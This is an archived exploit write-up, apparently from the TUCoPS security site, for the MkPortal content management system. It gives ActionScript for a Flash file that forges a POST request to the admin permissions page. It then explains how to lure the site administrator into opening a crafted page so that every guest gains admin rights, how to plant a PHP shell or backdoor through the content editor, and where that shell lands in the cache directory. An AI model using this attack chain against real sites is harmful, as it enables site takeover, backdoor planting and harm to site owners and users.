TUCoPS :: Web :: CMS / Portals :: c07-1622.htm

MkPortal "All Guests are Admin" Exploit
MkPortal "All Guests are Admin" Exploit
MkPortal "All Guests are Admin" Exploit



MkPortal "All Guests are Admin" Exploit

Vulnerability discovered and exploited by: Demential
Web: http://headburn.altervista.org 
E-mail: info[at]burnhead[dot]it
Mkportal website: http://www.mkportal.it 

Start Macromedia Flash and create an swf file with this code:

var idg:Number = 9;
var p13:Number = 1;
var Salva:String = "Save+Permissions";
getURL("http://victim.com/mkportal/admin.php?ind=ad_perms&op=save_main", "_self", "POST"); 

Translate "Save+Permissions" in MKPortal language.
Example: "Salva+questi+permessi" for italian sites.

Then upload the swf file to a webserver and create an html page like this:



Put a title here


Put some text here

Now send the html page to MKPortal administrator. When admin opens the page all guests will be able to administrate MKPortal. So you can go here: http://victim.com/mkportal/admin.php?ind=ad_contents&op=contents_new_php and paste a php shell or a backdoor. You can find your shell here: http://victim.com/mkportal/cache/ppage_*.php where * is the ID of the page. Translate "page" in MKPortal language. Example: "pagina" for italian sites.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH